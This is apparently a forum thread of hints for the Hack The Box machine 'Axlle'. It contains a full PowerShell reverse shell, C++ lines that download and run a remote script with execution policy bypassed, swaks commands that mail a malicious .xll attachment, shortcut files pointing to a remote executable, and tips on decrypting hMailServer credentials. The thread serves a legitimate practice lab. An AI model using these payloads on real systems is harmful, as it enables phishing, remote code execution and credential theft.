[bmoon10]

Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

The hash in the hMailServer.INI is not crackable with rockyou

Yeah hmailer theres a decrpyt vbs in addons you can use, I modified it and decrypted the pass from the INI

https://github.com/GitMirar/hMailDatabas...dDecrypter

can be used for decrypting the encrypted blowfish password from hMailServer.INI. only the sqlserver hash is crackable.

[osamy7593]

The hash in the hMailServer.INI is not crackable with rockyou

Hash what hash? search in C:\Program Files (x86)\hMailServer\Data

lnk in C:\inetpub\testing is not working, which type of "web shortcuts" is working for you?

 I was just about to start dropping stuff in there, what did you use as your lnk file?

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\inetpub\testing\test.lnk")
$lnk.TargetPath = "PATH to payload"
$lnk.Save()

But, this is not working..

.lnk injection i saw this in mist.htb

---

figured

seems to work for some but not others

done it 100 times now with no response

tried encoded ps like you suggested and still nothing

so weird

Bro maybe u need to --server 10.10.11.21 --port 25

pretty sure my swaks command is okay but appreciate the sanity check

swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll

my vip ip for the box is different but ye

and that test.xll works locally

Maybe the internet issue close ur vm and try again if not download xllpoc and go to dllmain.cpp put the code after that xllpoc.sln open it in vs and build it the .dll will be created rename it to .xll after that send

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

No problem bro try again tomorrow u will do it

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[bmoon10]

Bro maybe u need to --server 10.10.11.21 --port 25

pretty sure my swaks command is okay but appreciate the sanity check

swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll

my vip ip for the box is different but ye

and that test.xll works locally

Maybe the internet issue close ur vm and try again if not download xllpoc and go to dllmain.cpp put the code after that xllpoc.sln open it in vs and build it the .dll will be created rename it to .xll after that send

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

Same ....

couple of things:

1.swaks that i've used and worked  - 

swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll

2.powershell execution - made the rev shell work with addition of command in the xll example cpp file

system ("curl http://<IP>:<PORT>/revsh.ps1 | powershell -nop -W hidden -noni -ep bypass -f  -");

revsh.ps1

$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

Replace <IP>,<PORT> with your IP, PORT

cheers

[sk_Dutta]

pretty sure my swaks command is okay but appreciate the sanity check

swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll

my vip ip for the box is different but ye

and that test.xll works locally

Maybe the internet issue close ur vm and try again if not download xllpoc and go to dllmain.cpp put the code after that xllpoc.sln open it in vs and build it the .dll will be created rename it to .xll after that send

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

Same ....

couple of things:

1.swaks that i've used and worked  - 

swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll

2.powershell execution - i made it work with two steps in the cpp file

system("curl http://<IP>:<PORT>/revsh.ps1 -o %TEMP%\revsh.ps1");
system("powershell -nop -W hidden -noni -ep bypass -f %TEMP%\revsh.ps1");

revsh.ps1

$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

Replace <IP>,<PORT> with your IP, PORT

cheers

So basically you are creating a cpp file with system commands and then attaching it to the xll file ?

[maggi]

anyone have a tip on how to move on from gideon after finding the hmail creds?

[saoBFo]

Any hint for root ? Is dll hijack for kbfiltr ?

[ritualist]

anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me

$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

[maggi]

anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me

$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

Good looks I didn't think of that!
 I knew it was a link but I always forget I can share a share

[game95]

After get shell what to get user flag?

[Sqweez]

After get shell what to get user flag?

in C:\Program Files (x86)\hMailServer u have a some config files with password hash. Use https://github.com/GitMirar/hMailDatabas...dDecrypter for unhash the password for MSSQL database